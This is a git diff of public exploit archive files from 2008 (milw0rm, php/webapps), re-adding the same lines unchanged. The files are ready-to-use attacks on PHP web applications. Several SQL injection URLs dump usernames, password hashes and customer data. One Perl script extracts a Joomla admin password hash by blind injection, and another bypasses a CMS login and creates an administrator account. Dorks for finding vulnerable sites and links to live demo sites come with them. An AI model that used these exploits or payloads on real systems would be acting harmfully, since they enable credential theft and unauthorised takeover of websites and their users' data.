@@ -1,57 +1,57 @@ -######################################################### -# -# Online Booking Manager2.2 (id=) SQL Injection Vulnerability -# -######################################################### -# -# Author: Hussin X -# -# Home : www.tryag.cc/cc -# -# email: darkangel_g85[at]Yahoo[DoT]com -# hussin.x[at]hotmail[DoT]com -# -# IRAQI -# -########################################################## -# HomE script : http://www.onlinebookingmanager.com -# -# demo : http://demo.onlinebookingmanager.com/guestside/ -# -########################################################## -# -# DorK : Online Booking Manager2.2 -# -########################################################## - -Exploit: - - -http://www.site.com/obmp22/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users-- - - - - -L!VE DEMO: - - -http://demo.onlinebookingmanager.com/adminside/hotel/obm2.2/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users-- - - - - -Login AdmiN : - - - -/adminside/systemadmin/ - - -####################################( Greetz )################################## -# # -# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # -# Silic0n/ FAHD / Iraqihack # -# # -#################################(and All IRAQIs)############################### - -# milw0rm.com [2008-06-28] +######################################################### +# +# Online Booking Manager2.2 (id=) SQL Injection Vulnerability +# +######################################################### +# +# Author: Hussin X +# +# Home : www.tryag.cc/cc +# +# email: darkangel_g85[at]Yahoo[DoT]com +# hussin.x[at]hotmail[DoT]com +# +# IRAQI +# +########################################################## +# HomE script : http://www.onlinebookingmanager.com +# +# demo : http://demo.onlinebookingmanager.com/guestside/ +# +########################################################## +# +# DorK : Online Booking Manager2.2 +# 
+########################################################## + +Exploit: + + +http://www.site.com/obmp22/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users-- + + + + +L!VE DEMO: + + +http://demo.onlinebookingmanager.com/adminside/hotel/obm2.2/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users-- + + + + +Login AdmiN : + + + +/adminside/systemadmin/ + + +####################################( Greetz )################################## +# # +# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # +# Silic0n/ FAHD / Iraqihack # +# # +#################################(and All IRAQIs)############################### + +# milw0rm.com [2008-06-28] diff --git a/platforms/php/webapps/5965.txt b/platforms/php/webapps/5965.txt index 1a20f69f5..5b17c07e9 100755 --- a/platforms/php/webapps/5965.txt +++ b/platforms/php/webapps/5965.txt 
@@ -1,21 +1,21 @@ -/---------------------------------------------------------------\ -\ / -/ Joomla Component beamospetition Remote SQL injection \ -\ / -\---------------------------------------------------------------/ - - -[*] Author : His0k4 [ALGERIAN HaCkEr] - -[*] Dork : inurl:com_beamospetition - -[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL} - -[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- - ----------------------------------------------------------------------------- -[*] Greetings : All friends & muslims HaCkeRs... -[*] Greetings2: http://www.dz-secure.com - http://palcastle.org/cc - -# milw0rm.com [2008-06-28] +/---------------------------------------------------------------\ +\ / +/ Joomla Component beamospetition Remote SQL injection \ +\ / +\---------------------------------------------------------------/ + + +[*] Author : His0k4 [ALGERIAN HaCkEr] + +[*] Dork : inurl:com_beamospetition + +[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL} + +[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- + +---------------------------------------------------------------------------- +[*] Greetings : All friends & muslims HaCkeRs... +[*] Greetings2: http://www.dz-secure.com + http://palcastle.org/cc + +# milw0rm.com [2008-06-28] diff --git a/platforms/php/webapps/5966.pl b/platforms/php/webapps/5966.pl index 51b337993..eff728b89 100755 --- a/platforms/php/webapps/5966.pl +++ b/platforms/php/webapps/5966.pl 
@@ -1,115 +1,115 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; - -if(!$ARGV[1]) -{ - print " \n"; - print " ################################################################\n"; - print " # Joomla Component Xe webtv Blind SQL Injection Exploit #\n"; - print " # Author:His0k4 [ALGERIAN HaCkeR] #\n"; - print " # #\n"; - print " # Conctact: His0k4.hlm[at]gamil.com #\n"; - print " # Greetz: All friends & muslims HacKeRs #\n"; - print " # Greetz2: http://www.dz-secure.com #\n"; - print " # http://www.palcastle.org/cc #\n"; - print " # #\n"; - print " # Dork: inurl:com_xewebtv #\n"; - print " # Usage: perl xewebtv.pl host path #\n"; - print " # Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2 #\n"; - print " # #\n"; - print " # Options: #\n"; - print " # -t Valid tv id #\n"; - print " # -c Category value of the following id #\n"; - print " # Note: #\n"; - print " # You can change the match string if you need that #\n"; - print " ################################################################\n"; - - exit; -} - -my $host = $ARGV[0]; -my $path = $ARGV[1]; -my $cid = $ARGV[2]; -my $tid = $ARGV[3]; - -my %options = (); -GetOptions(\%options, "c=i", "p=s", "t=i"); - -print "[~] Exploiting...\n"; - -if($options{"c"}) -{ - $cid = $options{"c"}; -} - -if($options{"t"}) -{ - $tid = $options{"t"}; -} - -syswrite(STDOUT, "[~] MD5-Hash: ", 14); - -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $path, $cid, $tid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $path, $cid, $tid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} - -print "\n[~] Exploiting done\n"; - -sub istrue2 -{ - my $host = shift; - my $path = shift; - my $cid = shift; - my $tid = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = 
"http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "viewcategory&catid=".$cid.""; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } - -} - -# milw0rm.com [2008-06-28] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; + +if(!$ARGV[1]) +{ + print " \n"; + print " ################################################################\n"; + print " # Joomla Component Xe webtv Blind SQL Injection Exploit #\n"; + print " # Author:His0k4 [ALGERIAN HaCkeR] #\n"; + print " # #\n"; + print " # Conctact: His0k4.hlm[at]gamil.com #\n"; + print " # Greetz: All friends & muslims HacKeRs #\n"; + print " # Greetz2: http://www.dz-secure.com #\n"; + print " # http://www.palcastle.org/cc #\n"; + print " # #\n"; + print " # Dork: inurl:com_xewebtv #\n"; + print " # Usage: perl xewebtv.pl host path #\n"; + print " # Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2 #\n"; + print " # #\n"; + print " # Options: #\n"; + print " # -t Valid tv id #\n"; + print " # -c Category value of the following id #\n"; + print " # Note: #\n"; + print " # You can change the match string if you need that #\n"; + print " ################################################################\n"; + + exit; +} + +my $host = $ARGV[0]; +my $path = $ARGV[1]; +my $cid = $ARGV[2]; +my $tid = $ARGV[3]; + +my %options = (); +GetOptions(\%options, "c=i", "p=s", "t=i"); + +print "[~] Exploiting...\n"; + +if($options{"c"}) +{ + $cid = $options{"c"}; +} + +if($options{"t"}) +{ + $tid = $options{"t"}; +} + +syswrite(STDOUT, "[~] MD5-Hash: ", 14); + +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $path, $cid, $tid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, 
chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $path, $cid, $tid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} + +print "\n[~] Exploiting done\n"; + +sub istrue2 +{ + my $host = shift; + my $path = shift; + my $cid = shift; + my $tid = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "viewcategory&catid=".$cid.""; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } + +} + +# milw0rm.com [2008-06-28] diff --git a/platforms/php/webapps/5967.txt b/platforms/php/webapps/5967.txt index 82cfda85c..7d0123c5b 100755 --- a/platforms/php/webapps/5967.txt +++ b/platforms/php/webapps/5967.txt 
@@ -1,68 +1,68 @@ -# Name: SebracCMS -# Webiste: http://www.sebrac.netsons.org/cms/ -# Vulnerability type: SQL Injection -# Author: -# shinmai, 2008-06-28 -###################################################################################### -# Description: -# -# SebracCMS contains two major SQL injection vulnerabilities: -# Unsanitazed POST-variables in SQL queries when logging users in. This allows -# login access without proper credentials. -# And unsanitized GET-variables in SQL queries when loading articles. -This allows -# an attacker to read all usernames and passwordhashes in the database. -# -# Vulnerable code in cms/index.php: - -$n=$_POST['uname']; -$p= strtolower($_POST['upass']); -$cryp_p = md5($p); -//connect to db -include('incls/config.php'); -$query="select * from sbc_user where uname='$n' and pw='$cryp_p'"; - -# -# POC -# -# using -admin' OR '1'='1 -# as the username will allow login without proper registered credentials -# -# -# The second and far more serious SQL Injection is in cms/form/read.php -# -# This vulnerability allows an attacker to reveal all users and their -md5-password hashes. -# -# -# Vulnerable code in cms/form/read.php: - -$rec=($_GET['recid']); -*SNIP* -$query="Select * from sbc_articles where idart= '$rec'" or die(mysql_error()); - -# -# POC -# -# using -1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1 -# as the GET-variable 'recid' reveals the first post along with all -registered users and their passwordhashes. -# Example: -http://localhost/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT -uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1 - -# -# There are some other SQLI-vulnerabilities there, but these two are -the most severe. I was going to include -# one more for changing any users password, but I simply didn't have -the time to start crafting very complex -# injections. 
Also, I have a sneaking suspicion there's a -LFI-vulnerability in the photo-gallery code in the CMS, -# but if there is one, I'll write up an other advisory on that. -# -# As always, Good luck and be safe. -# - -# milw0rm.com [2008-06-28] +# Name: SebracCMS +# Webiste: http://www.sebrac.netsons.org/cms/ +# Vulnerability type: SQL Injection +# Author: +# shinmai, 2008-06-28 +###################################################################################### +# Description: +# +# SebracCMS contains two major SQL injection vulnerabilities: +# Unsanitazed POST-variables in SQL queries when logging users in. This allows +# login access without proper credentials. +# And unsanitized GET-variables in SQL queries when loading articles. +This allows +# an attacker to read all usernames and passwordhashes in the database. +# +# Vulnerable code in cms/index.php: + +$n=$_POST['uname']; +$p= strtolower($_POST['upass']); +$cryp_p = md5($p); +//connect to db +include('incls/config.php'); +$query="select * from sbc_user where uname='$n' and pw='$cryp_p'"; + +# +# POC +# +# using +admin' OR '1'='1 +# as the username will allow login without proper registered credentials +# +# +# The second and far more serious SQL Injection is in cms/form/read.php +# +# This vulnerability allows an attacker to reveal all users and their +md5-password hashes. +# +# +# Vulnerable code in cms/form/read.php: + +$rec=($_GET['recid']); +*SNIP* +$query="Select * from sbc_articles where idart= '$rec'" or die(mysql_error()); + +# +# POC +# +# using +1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1 +# as the GET-variable 'recid' reveals the first post along with all +registered users and their passwordhashes. +# Example: +http://localhost/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT +uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1 + +# +# There are some other SQLI-vulnerabilities there, but these two are +the most severe. 
I was going to include +# one more for changing any users password, but I simply didn't have +the time to start crafting very complex +# injections. Also, I have a sneaking suspicion there's a +LFI-vulnerability in the photo-gallery code in the CMS, +# but if there is one, I'll write up an other advisory on that. +# +# As always, Good luck and be safe. +# + +# milw0rm.com [2008-06-28] diff --git a/platforms/php/webapps/5969.txt b/platforms/php/webapps/5969.txt index b434c1022..c0832049a 100755 --- a/platforms/php/webapps/5969.txt +++ b/platforms/php/webapps/5969.txt 
@@ -1,32 +1,32 @@ -###################### -# -#AcmlmBoard v1.A2 SQL Injection Vulnerability -# -###################### -# -#Bug by: h0yt3r -# -#Dork: "AcmlmBoard v1.A2" -# -## -### -## -# -#This Board Software suffers from some not correctly verified variables which are used in SQL Querys. -#An Attacker can easily get sensitive information from the database by -#injecting unexpected SQL Querys. -# -#SQL Injection: -#http://[target]/[path]/memberlist.php?sort=&pow=[SQL] -# -#PoC: -#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+ -# -####################### -# -#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team! -# -####################### -####################### - -# milw0rm.com [2008-06-30] +###################### +# +#AcmlmBoard v1.A2 SQL Injection Vulnerability +# +###################### +# +#Bug by: h0yt3r +# +#Dork: "AcmlmBoard v1.A2" +# +## +### +## +# +#This Board Software suffers from some not correctly verified variables which are used in SQL Querys. +#An Attacker can easily get sensitive information from the database by +#injecting unexpected SQL Querys. +# +#SQL Injection: +#http://[target]/[path]/memberlist.php?sort=&pow=[SQL] +# +#PoC: +#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+ +# +####################### +# +#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team! +# +####################### +####################### + +# milw0rm.com [2008-06-30] diff --git a/platforms/php/webapps/5970.txt b/platforms/php/webapps/5970.txt index 6547f92ae..42750de2a 100755 --- a/platforms/php/webapps/5970.txt +++ b/platforms/php/webapps/5970.txt 
@@ -1,72 +1,72 @@ -- , .ss$$$$$$$$$$s, -- $. s$$$$$$$$$$$$$$`$$Ss -- "$$$$$$$$$$$$$$$$$$o$$$ , -- s$$$$$$$$$$$$$$$$$$$$$$$$s, ,s -- s$$$$$$$$$"$$$$$$""""$$$$$$"$$$$$, -- s$$$$$$$$$$s""$$$$ssssss"$$$$$$$$" -- s$$$$$$$$$$' `"""ss"$"$s"" -- s$$$$$$$$$$, `"""""$ .s$$s -- s$$$$$$$$$$$$s,... `s$$' ` -- `ssss$$$$$$$$$$$$$$$$$$$$####s. .$$"$. , s- -- `""""$$$$$$$$$$$$$$$$$$$$#####$$$$$$" $.$' -- "$$$$$$$$$$$$$$$$$$$$$####s"" .$$$| -- "$$$$$$$$$$$$$$$$$$$$$$$$##s .$$" $ -- $$""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" ` -- $$" "$"$$$$$$$$$$$$$$$$$$$$S""""' -- , ," ' $$$$$$$$$$$$$$$$####s -- $. .s$$$$$$$$$$$$$$$$$####" -- "$s. ..ssS$$$$$$$$$$$$$$$$$$$####" -- .$$$S$$$$$$$$$$$$$$$$$$$$$$$$#####" -- ..sS$$$$$$$$$$$$$$$$$$$$$$$$$$$######"" -- "$$sS$$$$$$$$$$$$$$$$$$$$$$$$$$$########" -- , s$$$$$$$$$$$$$$$$$$$$$$$$#########""' -- $ s$$$$$$$$$$$$$$$$$$$$$#######""' s' , -- $$..$$$$$$$$$$$$$$$$$$######"' ....,$$.... ,$ -- "$$$$$$$$$$$$$$$######"' , .sS$$$$$$$$$$$$$$$$s$$ -- $$$$$$$$$$$$#####" $, .s$$$$$$$$$$$$$$$$$$$$$$$$s. -- ) $$$$$$$$$$$#####' `$$$$$$$$$###########$$$$$$$$$$$. -- (( $$$$$$$$$$$##### $$$$$$$$###" "####$$$$$$$$$$ - - ######################################################################## - # # - # ...:::::eSHOP100 SQL Injection Vulnerbility ::::.... 
# - ######################################################################## - - - ## AUTHOR : JuDge - - ## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com - - ## Script WebSite:http://www.eshop100.co.uk - - ##Dork::) - -##DescRipTiON: pull customers info from database - -##EXPLOITS: - www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/* - - - ##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/* - -======================================================================================================================================= -## thx to : All My FrienDs - - i'm Not a HaCker -- ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s' -- ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$' ) -- (( $$$$$$$$$$$##### $$$$$$$$###" "####$$$$$$$$$$ -- ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s' -- ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$' -- ) ( ( $$"$$$$$$$$$$$#####.$$$$$###' JuDge Da .###$$$$$$$$$$" -- ( ) ) _,$" $$$$$$$$$$$$######.$$##' BeST .###$$$$$$$$$$ -- ) ( ( \. "$$$$$$$$$$$$$#######,,,. ..####$$$$$$$$$$$" -- ( )$ ) ) ,$$$$$$$$$$$$$$$$$$####################$$$$$$$$$$$" -- ( ($$ ( \ _sS" `"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S$$, -- ) )$$$s ) ) . . `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"' `$$ -- ( $$$Ss/ .$, .$,,s$$$$$$##S$$$$$$$$$$$$$$$$$$$$$$$$S"" ' -- \)_$$$$$$$$$$$$$$$$$$$$$$$##" $$ `$$. `$$. -- `"S$$$$$$$$$$$$$$$$$#" $ `$ `$ -- `"""""""""""""' ' ' ' - -# milw0rm.com [2008-06-30] +- , .ss$$$$$$$$$$s, +- $. 
s$$$$$$$$$$$$$$`$$Ss +- "$$$$$$$$$$$$$$$$$$o$$$ , +- s$$$$$$$$$$$$$$$$$$$$$$$$s, ,s +- s$$$$$$$$$"$$$$$$""""$$$$$$"$$$$$, +- s$$$$$$$$$$s""$$$$ssssss"$$$$$$$$" +- s$$$$$$$$$$' `"""ss"$"$s"" +- s$$$$$$$$$$, `"""""$ .s$$s +- s$$$$$$$$$$$$s,... `s$$' ` +- `ssss$$$$$$$$$$$$$$$$$$$$####s. .$$"$. , s- +- `""""$$$$$$$$$$$$$$$$$$$$#####$$$$$$" $.$' +- "$$$$$$$$$$$$$$$$$$$$$####s"" .$$$| +- "$$$$$$$$$$$$$$$$$$$$$$$$##s .$$" $ +- $$""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" ` +- $$" "$"$$$$$$$$$$$$$$$$$$$$S""""' +- , ," ' $$$$$$$$$$$$$$$$####s +- $. .s$$$$$$$$$$$$$$$$$####" +- "$s. ..ssS$$$$$$$$$$$$$$$$$$$####" +- .$$$S$$$$$$$$$$$$$$$$$$$$$$$$#####" +- ..sS$$$$$$$$$$$$$$$$$$$$$$$$$$$######"" +- "$$sS$$$$$$$$$$$$$$$$$$$$$$$$$$$########" +- , s$$$$$$$$$$$$$$$$$$$$$$$$#########""' +- $ s$$$$$$$$$$$$$$$$$$$$$#######""' s' , +- $$..$$$$$$$$$$$$$$$$$$######"' ....,$$.... ,$ +- "$$$$$$$$$$$$$$$######"' , .sS$$$$$$$$$$$$$$$$s$$ +- $$$$$$$$$$$$#####" $, .s$$$$$$$$$$$$$$$$$$$$$$$$s. +- ) $$$$$$$$$$$#####' `$$$$$$$$$###########$$$$$$$$$$$. +- (( $$$$$$$$$$$##### $$$$$$$$###" "####$$$$$$$$$$ + + ######################################################################## + # # + # ...:::::eSHOP100 SQL Injection Vulnerbility ::::.... 
# + ######################################################################## + + + ## AUTHOR : JuDge + + ## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com + + ## Script WebSite:http://www.eshop100.co.uk + + ##Dork::) + +##DescRipTiON: pull customers info from database + +##EXPLOITS: + www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/* + + + ##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/* + +======================================================================================================================================= +## thx to : All My FrienDs + + i'm Not a HaCker +- ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s' +- ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$' ) +- (( $$$$$$$$$$$##### $$$$$$$$###" "####$$$$$$$$$$ +- ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s' +- ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$' +- ) ( ( $$"$$$$$$$$$$$#####.$$$$$###' JuDge Da .###$$$$$$$$$$" +- ( ) ) _,$" $$$$$$$$$$$$######.$$##' BeST .###$$$$$$$$$$ +- ) ( ( \. "$$$$$$$$$$$$$#######,,,. ..####$$$$$$$$$$$" +- ( )$ ) ) ,$$$$$$$$$$$$$$$$$$####################$$$$$$$$$$$" +- ( ($$ ( \ _sS" `"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S$$, +- ) )$$$s ) ) . . `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"' `$$ +- ( $$$Ss/ .$, .$,,s$$$$$$##S$$$$$$$$$$$$$$$$$$$$$$$$S"" ' +- \)_$$$$$$$$$$$$$$$$$$$$$$$##" $$ `$$. `$$. +- `"S$$$$$$$$$$$$$$$$$#" $ `$ `$ +- `"""""""""""""' ' ' ' + +# milw0rm.com [2008-06-30] diff --git a/platforms/php/webapps/5971.pl b/platforms/php/webapps/5971.pl index 967dce397..1f99acac6 100755 --- a/platforms/php/webapps/5971.pl +++ b/platforms/php/webapps/5971.pl 
@@ -1,122 +1,122 @@ -#!/usr/bin/perl -#============================================ -# BareNuked CMS Arbitrary Add Admin Exploit -#============================================ -# -# ,--^----------,--------,-----,-------^--, -# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. -# `+---------------------------^----------| -# `\_,-------, _________________________| -# / XXXXXX /`| / -# / XXXXXX / `\ / -# / XXXXXX /\______( -# / XXXXXX / -# / XXXXXX / -# (________( -# `------' -# -#AUTHOR : CWH Underground -#DATE : 30 June 2008 -#SITE : cwh.citec.us -# -# -##################################################### -#APPLICATION : BareNuked CMS -#VERSION : 1.1.0 -#DOWNLOAD : http://downloads.sourceforge.net/barenuked/barenuked-1.1.0.zip -###################################################### -# -#Note: magic_quotes_gpc = off -# -#This Exploit will Add user to Administrator's Privilege. -# -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## -# -# milw0rm.com [2008-06-30] - - -use LWP; -use HTTP::Request; -use HTTP::Cookies; - -if ($#ARGV + 1 != 4) -{ - print "\n==============================================\n"; - print " BareNuked CMS Arbitrary Add Admin Exploit \n"; - print " \n"; - print " Discovered By CWH Underground \n"; - print "==============================================\n"; - print " \n"; - print " ,--^----------,--------,-----,-------^--, \n"; - print " | ||||||||| `--------' | O \n"; - print " `+---------------------------^----------| \n"; - print " `\_,-------, _________________________| \n"; - print " / XXXXXX /`| / \n"; - print " / XXXXXX / `\ / \n"; - print " / XXXXXX /\______( \n"; - print " / XXXXXX / \n"; - print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; - print " (________( \n"; - print " `------' \n"; - print " \n"; - print "Usage: ./xpl-barenuked.pl \n"; - print "Ex. 
./xpl-barenuked.pl http://www.target.com/barenuked/ cwh password cwh\@cwh.com\n"; - exit(); -} - -$cmsurl = $ARGV[0]; -$user = $ARGV[1]; -$pass = $ARGV[2]; -$mail = $ARGV[3]; - - -$loginurl = $cmsurl."admin/index.php"; -$adduserurl = $cmsurl."admin/users.php"; -$post_content = "name=".$user."&pass=".$pass."&email=".$mail."&rights=admin&mode=create&Submit=New"; - -print "\n..::Login Page URL::..\n"; -print "[+] $loginurl\n"; -print "\n..::Add User Page URL::..\n"; -print "[+] $adduserurl\n\n"; - -$ua = LWP::UserAgent->new; -$ua->cookie_jar(HTTP::Cookies->new); - -$request = HTTP::Request->new (POST => $loginurl); -$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'); -$request->content_type ('application/x-www-form-urlencoded'); -$request->content ('username=admin&password=\' or \'a\'=\'a&submit=Log+In'); - -$response = $ua->request($request); - -$content = $response->content; - -if ($content =~ /My Webpage Administration/) -{ - print "\n!!! Login Success !!!\n\n"; -} -else -{ - print "\n!!! Login Failed !!!\n\n"; - exit(); -} - -$request = HTTP::Request->new (POST => $adduserurl); -$request->content_type ('application/x-www-form-urlencoded'); -$request->content ($post_content); -$response = $ua->request($request); - -$content = $response->content; - -if ($content =~ /$user/) -{ - print "\n!!! Exploit Completed !!!\n"; -} -else -{ - print "\n!!! Exploit Failed !!!\n"; -} - -# milw0rm.com [2008-06-30] +#!/usr/bin/perl +#============================================ +# BareNuked CMS Arbitrary Add Admin Exploit +#============================================ +# +# ,--^----------,--------,-----,-------^--, +# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+# `+---------------------------^----------| +# `\_,-------, _________________________| +# / XXXXXX /`| / +# / XXXXXX / `\ / +# / XXXXXX /\______( +# / XXXXXX / +# / XXXXXX / +# (________( +# `------' +# +#AUTHOR : CWH Underground +#DATE : 30 June 2008 +#SITE : cwh.citec.us +# +# +##################################################### +#APPLICATION : BareNuked CMS +#VERSION : 1.1.0 +#DOWNLOAD : http://downloads.sourceforge.net/barenuked/barenuked-1.1.0.zip +###################################################### +# +#Note: magic_quotes_gpc = off +# +#This Exploit will Add user to Administrator's Privilege. +# +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## +# +# milw0rm.com [2008-06-30] + + +use LWP; +use HTTP::Request; +use HTTP::Cookies; + +if ($#ARGV + 1 != 4) +{ + print "\n==============================================\n"; + print " BareNuked CMS Arbitrary Add Admin Exploit \n"; + print " \n"; + print " Discovered By CWH Underground \n"; + print "==============================================\n"; + print " \n"; + print " ,--^----------,--------,-----,-------^--, \n"; + print " | ||||||||| `--------' | O \n"; + print " `+---------------------------^----------| \n"; + print " `\_,-------, _________________________| \n"; + print " / XXXXXX /`| / \n"; + print " / XXXXXX / `\ / \n"; + print " / XXXXXX /\______( \n"; + print " / XXXXXX / \n"; + print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; + print " (________( \n"; + print " `------' \n"; + print " \n"; + print "Usage: ./xpl-barenuked.pl \n"; + print "Ex. 
./xpl-barenuked.pl http://www.target.com/barenuked/ cwh password cwh\@cwh.com\n"; + exit(); +} + +$cmsurl = $ARGV[0]; +$user = $ARGV[1]; +$pass = $ARGV[2]; +$mail = $ARGV[3]; + + +$loginurl = $cmsurl."admin/index.php"; +$adduserurl = $cmsurl."admin/users.php"; +$post_content = "name=".$user."&pass=".$pass."&email=".$mail."&rights=admin&mode=create&Submit=New"; + +print "\n..::Login Page URL::..\n"; +print "[+] $loginurl\n"; +print "\n..::Add User Page URL::..\n"; +print "[+] $adduserurl\n\n"; + +$ua = LWP::UserAgent->new; +$ua->cookie_jar(HTTP::Cookies->new); + +$request = HTTP::Request->new (POST => $loginurl); +$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'); +$request->content_type ('application/x-www-form-urlencoded'); +$request->content ('username=admin&password=\' or \'a\'=\'a&submit=Log+In'); + +$response = $ua->request($request); + +$content = $response->content; + +if ($content =~ /My Webpage Administration/) +{ + print "\n!!! Login Success !!!\n\n"; +} +else +{ + print "\n!!! Login Failed !!!\n\n"; + exit(); +} + +$request = HTTP::Request->new (POST => $adduserurl); +$request->content_type ('application/x-www-form-urlencoded'); +$request->content ($post_content); +$response = $ua->request($request); + +$content = $response->content; + +if ($content =~ /$user/) +{ + print "\n!!! Exploit Completed !!!\n"; +} +else +{ + print "\n!!! Exploit Failed !!!\n"; +} + +# milw0rm.com [2008-06-30] diff --git a/platforms/php/webapps/5972.txt b/platforms/php/webapps/5972.txt index 882f216c5..9146b924c 100755 --- a/platforms/php/webapps/5972.txt +++ b/platforms/php/webapps/5972.txt 
